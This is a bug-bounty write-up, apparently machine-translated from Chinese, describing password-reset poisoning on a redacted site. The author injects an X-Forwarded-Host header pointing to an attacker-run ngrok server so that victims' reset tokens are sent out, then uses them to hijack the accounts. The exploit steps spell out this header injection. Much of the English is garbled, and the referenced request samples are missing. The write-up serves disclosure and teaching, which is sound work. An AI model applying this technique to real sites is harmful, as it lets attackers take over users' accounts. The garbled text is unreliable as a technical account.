Writeup today to share this goal through the use of the website is "forgot password" feature, X-Forwarded-Host Host Add bidding, the target website spoofing the password reset link directed to your own server password reset requests, so achieve complete hijacking of the victim accounts.
Here, based on confidentiality reasons to assume that the target test site redacted.com, in its testing process, I put it to focus on the "Forgot Password" feature at. After six hours of agonizing, I found very interesting in which there is a loophole to exploit the vulnerability of the target can be achieved full account of the hijacking victims.
The discovery process
Tools required: BurpSuite, Ngrok Server. Ngrok services can be mapped to their local PC Server on the public cloud, the purpose of the local PC into a network to communicate with the outside terminal server, the indirect Server on the cloud becomes a transit between the external network and internal network PC proxy.
1, access to the target site Forgot your password function, enter the user name information to request a password reset link: https: //redacted.com/users/forgot_password,Notice: After the destination site will send a reset to your registered email password link.
2, in the process, with the open Web capture BurpSuite, the request packet as follows:
Which we add an X-Forwarded-Host: bing.com to try to see whether the target site will contain the password reset link into bing.com;
X-Forwarded-For (XFF) is used to identify the connection to the Web server by HTTP proxy client load balancing methods or the most original IP address of an HTTP request header field. Developers Squid caching proxy server first introduced this HTTP header field, formally proposed in the draft by the IETF HTTP header field for Standardization [1]. DETAILED point herein by reference.
3. Here, we open the mailbox, view the target site to send password reset link long-sawed over, wow, we can see from the sent message, which contains the password reset link user Token information, generally looks as follows :
In this way, we can say that my password reset information has been forwarded to bing.com Token, here is the need for this to be a real Token verification, so we can put a password reset link in https://bing.com replacement to a target site https://redacted.com ;
4, and sure enough, we open up a page can really implement reset your password!
Exploit
According to the above operation and problems, I can construct a network architecture to hijack user-related information. Proceed as follows:
1, the service set up by ngrok Attacker server;
2, open Burpsuite capture, the destination site on the "Forgot Password" input user name information victims, a password reset determination operation;
3, in Burpsuite caught password reset request packet added Attacker server, formats such as:
X-Forwarded-Host: ngrok.ioAttacker address which ngrok.io domain name server. Such as:
4 domain name address, so when the victim received the password reset link target mailbox sent by the website will contain Attacker server, such as:
When the victim accidentally clicked the link, which will take the user to request a password reset Token Attacker server ngrok.io (here requires interaction with a user action);
5, while the victims point to open the link above in the Attacker ngrok.io server side, the attacker will see is a victim request information contains the user's password reset Token, as follows:
6、到此,攻击者获得了受害者用户的密码重置Token之后,把Attacker服务器ngrok.io替换成目标网站https://redacted.com,加上后续的受害者用户的密码重置Token,就可成功对受害者账户的重置密码,实现对其账户的完全劫持。
我把该漏洞进行上报后,奖励了我3位数美金的奖励$(Between $700-$1000)。感谢阅读。
